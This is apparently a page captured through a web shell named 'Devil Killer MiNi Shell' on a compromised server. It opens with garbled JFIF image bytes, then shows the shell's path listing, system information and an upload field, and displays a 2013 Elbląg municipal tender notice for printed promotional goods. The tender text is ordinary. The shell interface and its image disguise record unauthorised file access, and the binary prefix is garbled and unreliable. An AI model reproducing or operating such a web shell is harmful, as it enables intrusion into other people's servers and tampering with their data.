JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20130522/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20130522/84575-N-2013.html

<p class="kh_header"><b>Elbląg: Produkcja wraz z dostawą materiałów promocyjnych z nadrukiem</b><br>
<b>Numer ogłoszenia: 84575 - 2013; data zamieszczenia: 22.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Produkcja wraz z dostawą materiałów promocyjnych z nadrukiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia: Produkcja wraz z dostawą materiałów promocyjnych z nadrukiem Przedmiot główny: Nazewnictwo wg CPV: Materiały reklamowe 2. Zakres zamówienia. Zakres zamówienia obejmuje dostawę w etapach materiałów reklamowych oznaczonych logotypami, o następujących parametrach: 1) Balsam do ust z zawieszką - I etap: 500 szt.; II etap: 250 szt.; III etap: 250 szt. Opis: bezbarwny balsam ochronny z filtrami UVA i UVB, testowany dermatologicznie, certyfikat CE, waga min. 4,5 gr, zawieszka w kolorze pomadki, jednostkowo pakowane w folię przezroczystą, nadruk dwa kolory zgodnie z dostarczonym projektem przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 2) Ponczo przeciwdeszczowe zapakowane w etui z karabinkiem - I etap: 250 szt.; II etap: 250 szt. Opis: przezroczysty płaszcz przeciwdeszczowy wykonany z PE, rozmiar płaszcza: uniwersalny, zapakowany w okrągłe etui z karabinkiem wykonane z tworzywa ABS,  średnica etui: 55-70 mm, kolor etui: biały, druk na etui dwa kolory, zgodnie z dostarczonym projektem przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 3) Magnes na lodówkę Piekarczyk - I etap: 1000 szt.; II etap: 500 szt.; III etap: 500 szt. Opis: kształt postaci z elementami wypukłymi 2D, materiał wykonania: żywica epoksydowa na podkładzie magnetycznym, wysokość: 8,5-9,5 cm; szerokość: proporcjonalnie wg projektu, wykonanie full color zgodnie z dostarczonym projektem przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 4) Filiżanki z podstawką - I etap: 200 szt.; II etap: 50 szt.; III etap: 150 szt. Opis: pojemność: 190 ml, średnica spodka: 14-16 cm, materiał: porcelana, kolor: biały lub ecru - powierzchnia wewnętrzna i zewnętrzna, przeznaczona do mycia w zmywarce, pakowane jednostkowo w biały kartonik z okienkiem, umieszczone w opakowaniu na sztywno w sposób uniemożliwiający uszkodzenie elementów zestawu podczas przenoszenia, transportu, nadruk: kalkomanią zgodnie z dostarczonym projektem, nadruk z dwóch stron filiżanki i na podstawce, full color zgodnie z dostarczonym projektem przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nie ograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 5) Kubek - I etap: 500 szt.; II etap: 250 szt.; III etap: 250 szt. Opis: typ: Monika pojemność: 320 ml, wysokość - 115 mm, średnica - 95-68 mm, materiał: ceramiczny lub porcelanowy, kolor kubka: biały lub ecru - powierzchnia wewnętrzna i zewnętrzna pakowany jednostkowo w biały kartonik z okienkiem, nadruk: kalkomanią, druk full color na podstawie wzoru dostarczonego przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 6) Notes Kocham ELBLĄG - I etap: 200 szt.; II etap: 200 szt. Opis: materiał: makulatura, kolor: biały, wymiary produktu: 12 x 8 x 1 cm, rodzaj nadruku: tampondruk, druk full color według dostarczonego projektu. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 7) Podkładka pod kubek - I etap: 100 kompletów po 6 sztuk, pojedynczo - 600 szt.; II etap: 100 kompletów po 6 sztuk, pojedynczo - 600 szt. Opis: wymiary: kwadrat o boku 9,5-10 cm, zaokrąglone rogi, materiał: twarda płyta pilśniowa HDF o grubości 3 mm i podklejona korkiem naturalnym 1 mm, nadruk full color - jednostronny z dostarczonego przez Zamawiającego projektu, nadruk zabezpieczony folią UV odporną na wysokie temperatury, pakowane w folię przezroczystą; jednostkowo - 600 szt. Komplet pakowany w pudełko z okienkiem we wieczku, w komplecie 6 podkładek, po jednej z każdego rodzaju. 8) Znaczki Kocham Elbląg - I etap: 1000 szt.; II etap: 500 szt.; III etap: 500 szt. Opis: znaczek typu Button okrągły, wydruk zabezpieczony bezbarwną folią obciągnięty na krążku z aluminiowej blaszki, na podstawie wzoru dostarczonego przez Zamawiającego, zapięcie w postaci agrafki, wymiar w mm: 75 mm, druk cyfrowy full color. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 9) Długopisy - I etap: 1000 szt.; II etap: 1000 szt. Opis: długopis z wbudowana wysuwaną kartką o wymiarze 17 x 7 cm, zamontowana na spirali sprężynowej karta samoistnie skręca się i chowa do środka w chwili puszczenia notatki, materiał: plastik ABS, wymiary: 13,5-14,5 cm (długość) x 1-1,2 cm (średnica), waga: max 0.013 kg, kolor długopisu - Wykonawca zobowiązany jest do uzgodnienia przed produkcją kolor długopisów, wkład: kolor niebieski, typ wkładu - Slim wymienny, nadruk full color. Projekt nadruku na wysuwanej kartce na podstawie wzoru dostarczonego przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 10) Smycz - I etap: 1000 szt.; III etap: 1000 szt. Opis: Szerokości 1,4-1,6 cm, kolor pomarańczowy, plastikowy łącznik - przedłużka, metalowy karabińczyk, dodatkowo zawieszka do telefonu komórkowego, długość taśmy standardowa (86-88 cm), nadruk full color zgodnie z dostarczonym przez Zamawiającego projektem - zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków, Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 11) Kubek w pudełku - I etap: 100 szt.; II etap: 100 szt. Opis: kubek ceramiczny, wymiary: pojemność 350 ml, wysokość 110-112 mm, średnica 84-86 mm, nadruk dwa kolory na całej powierzchni, zgodnie z dostarczonym projektem, pudełko: tuba tekturowa o wymiarach dopasowanych do rozmiaru kubka, wykonane w sposób uniemożliwiający wypadanie kubka, nadruk na opakowaniu dwa kolory zgodnie z dostarczonym przez Zamawiającego projektem - zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 12) Pendrive - I etap: 150 szt.; II etap: 150 szt. Opis: USB pojemność min. 4 Gb, wykonanie z miękkiego PCV lub silikonu, nadruk dwa kolory zgodnie z dostarczonym projektem - zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 13) Pendrive bransoletka na nadgarstek - I etap: 150 szt.; II etap: 150 szt. Opis: USB pojemność min. 4 Gb, wykonanie z miękkiego silikonu kolor pomarańczowy, nadruk dwa kolory zgodnie z dostarczonym projektem - zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 14) Długopis metalowy - I etap: 1000 szt.; II etap: 500 szt.; III etap: 500 szt. Opis: długopis metalowy z niebieskim wkładem, wymiar wkładu dopasowany do wielkości długopisu, materiał: aluminium, kolor biały i pomarańczowy, wymiary: 140-145 mm x 10-11 mm. Wykonawca zobowiązany jest do uzgodnienia przed produkcją ilości długopisów we wskazanych kolorach, nadruk zgodnie z dostarczonym przez Zamawiającego projektem , zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 15) Zestaw memo - I etap: 500 szt.; III etap: 500 szt. Opis: Biurkowy zestaw składający się z pięciu różnokolorowych samoprzylepnych dwustronnych karteczek (każdy kolor powinien mieć nie mniej niż 150 karteczek) typu memo oraz jednego notesu (składającego się z nie mniej niż 200 karteczek samoprzylepnych) w białym otwieranym etui. Pakowany w woreczek foliowy. Wymiary pudełka: (+/- 2 mm) 90 x 178 x 24 mm, wymiar karteczek typu memo: (+/- 2 mm) 19x76 mm, wymiar notesu: (+/- 2 mm ) 76x76 mm, nadruk dwa kolory na wieczku etui zgodnie z dostarczonym przez Zamawiającego projektem, zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 16) Balony z patyczkami i zatyczkami oraz z pompką 220 V - I etap: 5000 szt. 1 pompka; II etap: 5000 szt. 1 pompka Opis: balony lateksowe, wymiar 12, w zestawie patyczki i zatyczki, balon musi posiadać specjalną powłokę, która umożliwi trwałe napompowanie go, patyczek + zatyczka w kolorze białym o łącznym wymiarze (+/- 1 cm) 38 cm, kolor balonów: biały i/lub pomarańczowy, Wykonawca zobowiązany jest do uzgodnienia przed produkcją ilości balonów we wskazanych kolorach, w zestawie do zamówienia jedna specjalistyczna pompka do nadmuchiwania balonów o standardowej budowie, podłączana do prądu 220 V, nadruk dwa kolory, zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków, zgodnie z dostarczonym projektem przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 17) Nadmuchiwana piłka plażowa - I etap: 100 szt.; II etap: 100 szt. Opis: sześciopanelowa dmuchana piłka plażowa, każda sztuka pakowana w osobnym foliowym woreczku, wykonana z PCV , dostosowana do norm unijnych, wymiary O 40 cm, nadruk dwa kolory, zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków, zgodnie z dostarczonym projektem przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 18) Breloczek odblaskowy w kształcie logo miasta - I etap: 1000 szt.; III etap: 1000 szt. Opis: zawieszki odblaskowe wykonane są z folii mikropryzmatycznej, w środku wypełnione pianką o grubości min. 2 mm, wzór logo Zamawiającego zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków, projekt dostarcza Zamawiający. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 19) Napoje izotoniczne - I etap: 1000 szt.; II etap: 500 szt.; III etap: 500 szt. Opis: napój izotoniczny o smaku cytrynowym w butelce 55-65 ml, nadruk dwa kolory, zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków, zgodnie z dostarczonym projektem przez Zamawiającego. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. Wykonawca powinien posiadać dokument potwierdzający dopuszczenie produktu do spożycia. 20) Pastylki, cukierki - I etap: 1000 szt.; II etap: 500 szt.; III etap: 500 szt. Opis: drażetki w blisterze 18 szt., smak owocowy, kolor biały i pomarańczowy - liczba drażetek w poszczególnych kolorach ustalona zostanie na etapie projektu, format: (+/- 2 mm) 85 x 62 x 8 mm, nadruk na drażetkach białych, zgodnie z dostarczonym projektem, zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków, opakowanie tekturowe nadruk dwa kolory, jednostronny zgodnie z dostarczonym projektem, zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków, projekt dostarcza Zamawiający. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu.
Wykonawca powinien posiadać dokument potwierdzający dopuszczenie produktu do spożycia. 21) Bidony - I etap: 500 szt.; II etap: 500 szt. Opis: bidon butelka o pojemności 540-560 ml, wygodny uchwyt, tworzywo - plastik, nadruk dwa kolory zgodnie z dostarczonym projektem, zgodnie z założeniami dotyczącymi oznakowania i kolorystyki zawartymi w księdze znaków, projekt dostarcza Zamawiający. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. Wykonawca powinien posiadać dokument potwierdzający dopuszczenie produktu do przechowywania w nim produktów spożywczych. 22) Chorągiewki na patyczku plastikowym - I etap: 5000 szt.; II etap: 5000 szt. Opis: chorągiewki na patyczku plastikowym - 2500 szt. chorągiewek barwy biało - czerwonej, 2500 szt. wg projektu Zamawiającego - dwa kolory, format A5 (148 x 210 mm), papier kredowany 135 g/m2, mocne klejenie na zawijkę (najtrwalsze), lakierowanie, projekt dostarcza Zamawiający. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 23) Kredki - I etap: 300 szt.; II etap: 300 szt. Opis: zestaw 12 kredek w kartonowym ekologicznym pudełku w kształcie tuby, wymiary: (+/- 0,2 cm) 15,6 x 11,6 x 2,9 cm, nadruk na pudełku: dwa kolory, projekt dostarcza Zamawiający. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 24) Naklejki - I etap: 1000 szt.; II etap: 1000 szt. Opis: naklejki samoprzylepne foliowe rycowane, nadruk jednostronny dwa kolory, rycowane w arkuszach, projekt dostarcza Zamawiający. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. Format arkusza: 500x500 mm, minimalny rozmiar grafiki: 2,5 cm x 2,5 cm - szt. 5000, minimalny rozmiar grafiki: 20 cm x 20 cm - szt. 5000, zadruk: 4+0 (CMYK), podłoże: folia samoprzylepna biała błysk, odporna na warunki atmosferyczne. 25) Zawieszka na torbę - I etap: 200 szt.; II etap: 100 szt.; III etap: 100 szt. Opis: wymiary: (+/- 2 mm) 43 mm x 110 mm, wykonanie: wysuwane, metalowe ramię na torebkę, praktyczny zaczep do blatu z wykonanym grawerem, projekt dostarcza Zamawiający. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. Każda zawieszka pakowana osobno, opakowanie: tekturowe kolor biały, wsuwane pudełko z przeźroczystą szybką. 26) Notes promocyjny z nadrukiem - I etap: 250 szt. - dwa kolory, 250 szt. - full color; II etap: 250 szt. - dwa kolory, 250 szt. - full color Opis: notatnik promocyjny z nadrukiem, wg parametrów: format A5 (21,3 x 14,7 cm), okładka: miękka poliuretanowa, kolor: czarny i biały, elastyczna opaska zapinająca kolor pomarańczowy, pomarańczowa tasiemka pomiędzy stronami, ilość kartek: 120 czystych kartek (bez linii) w kolorze kremowym, nadruk na okładce: 500 szt. - dwa kolory, 500 szt. - full color, projekt dostarcza Zamawiający. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. 27) T-shirt - I etap: 400 szt. (rozm.: S - 150 szt., M - 100 szt., L - 100 szt., XL - 50 szt.); II etap: 400 szt. (rozm.: S - 150 szt., M - 100 szt., L - 100 szt., XL - 50 szt.) Opis: 100 % wysokogatunkowej bawełny w podziale na rozmiary: S - 150 szt., M - 100 szt., L - 100 szt., XL - 50 szt., gramatura min. 160 g/m2, podwójny szew wokół szyi, przy rękawach i u dołu koszulki, bez szwów bocznych, taśma wzmacniająca na karku, krój prosty, wysoka jakość szycia, materiał i nadruk muszą być wytrzymałe, materiał niekurczący, pakowane jednostkowo w woreczki foliowe przezroczyste, znakowanie: metodą sitodruk w wymiarze do formatu A4, kolor: czarny, druk dwa kolory zgodnie z dostarczonym projektem przez Zamawiającego, szt. 800. Zamawiający zastrzega sobie możliwość wglądu w wizualizację produktu przed jego wyprodukowaniem oraz do nieograniczonych zmian w położeniu dostarczonego projektu na powierzchni przedmiotu. Miejsce dostawy: Urząd Miejski w Elblągu, ul. Łączności 1, 82-300 Elbląg 3. Zamawiający informuje, że logotypy w wersji wektorowej Wykonawca otrzyma od Zamawiającego w dniu zawarcia umowy w formie elektronicznej. 4. Wszystkie zaoferowane materiały muszą być pierwszego gatunku, fabrycznie nowe, wolne od wad, winny charakteryzować się wysoką estetyką i elegancją oraz starannością wykonania. 5. Zamawiający wymaga, aby Wykonawca w kolumnie Opis i parametry oferowanego przedmiotu formularza - Wycena dostawy, którego wzór stanowi ZAŁĄCZNIK NR 4 do SIWZ, podał opis i parametry oferowanego przedmiotu. W przypadku zgodności oferowanego przedmiotu z opisem Zamawiającego dopuszcza się zastosowanie zapisu zgodnie z SIWZ. 6. Zamawiający wymaga, aby Wykonawca dostarczył materiały do siedziby Zamawiającego w trzech etapach: I. etap w 2013 roku - 14 dni od daty udzielenia zamówienia II. etap - 30 października 2013 roku III. etap - 20 kwietnia 2014 roku 7. Zamawiający wymaga udzielenia 6 miesięcy gwarancji, liczonych od daty dokonania przez Zamawiającego odbioru ilościowego. 8. Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcy. Zamawiający żąda wskazania przez Wykonawcę w ofercie, którą część zamówienia powierza podwykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 3 000,00 zł (słownie: trzy tysiące złotych), Wadium należy wnieść przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.: - w pieniądzu, - w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, - w gwarancjach bankowych, - w gwarancjach ubezpieczeniowych, - w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620). Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy NR 13 1030 1218 0000 0000 9030 1632 Wadium wnoszone w innej formie niż w pieniądzu (oryginał dokumentu) należy zdeponować w sekretariacie Departamentu Księgowości Urzędu Miejskiego w Elblągu 2. Wykonawca, który nie wniesie wadium na okres związania ofertą zostanie przez Zamawiającego wykluczony z postępowania. 3. Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych. 4. Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 dostaw materiałów promocyjnych lub gadżetów reklamowych z nadrukiem o wartości min. 120 000,00 zł brutto każda dostawa. Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnianiu warunku tj. liczba wykonanych dostaw, będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wartości podane w walutach innych niż wskazane przez Zamawiającego dla wartości dostaw należy przeliczyć wg średniego kursu NBP na dzień odbioru tych dostaw, podając datę i kurs. Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
